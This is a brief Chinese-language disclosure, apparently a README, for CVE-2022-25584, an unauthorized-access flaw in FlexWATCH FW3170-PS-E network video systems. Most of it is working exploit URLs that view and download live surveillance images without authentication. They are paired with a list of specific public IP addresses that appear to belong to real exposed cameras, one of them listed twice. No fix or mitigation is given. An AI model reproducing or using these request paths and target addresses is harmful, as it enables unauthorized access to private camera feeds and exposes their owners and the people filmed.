Flexwatch-CVE
本文档针对 CVE-2022-25584 "已保留"
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25584

此漏洞已被 CNVD 收录,但尚未公开
CNVD ID:CNVD-2021-103443

漏洞复现:
我们发现由 Seyeon Tech Co., Ltd. 拥有的 FlexWATCH FW3170-PS-E 网络视频系统 4.23-3000_GY 存在未授权访问漏洞,攻击者可利用该漏洞获取监控图像并泄露敏感信息
例如:
http://211.174.227.102:10001/app/multi/single.asp

接着,我们可以访问:http://211.174.227.102:10001/cgi-bin/fwcamimgsave.cgi?FwModId=0&PortId=0&FwCgiVer=0x0001
下载监控实时画面


公司官网:http://www.flexwatch.com/
其他案例:
http://211.240.10.38:10001/app/multi/single.asp
http://121.133.21.35:10001/app/multi/single.asp
http://210.223.145.159:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://27.1.124.18:10001/app/multi/single.asp
http://183.100.61.196:10001/app/multi/single.asp
http://118.176.196.247:10001/app/multi/single.asp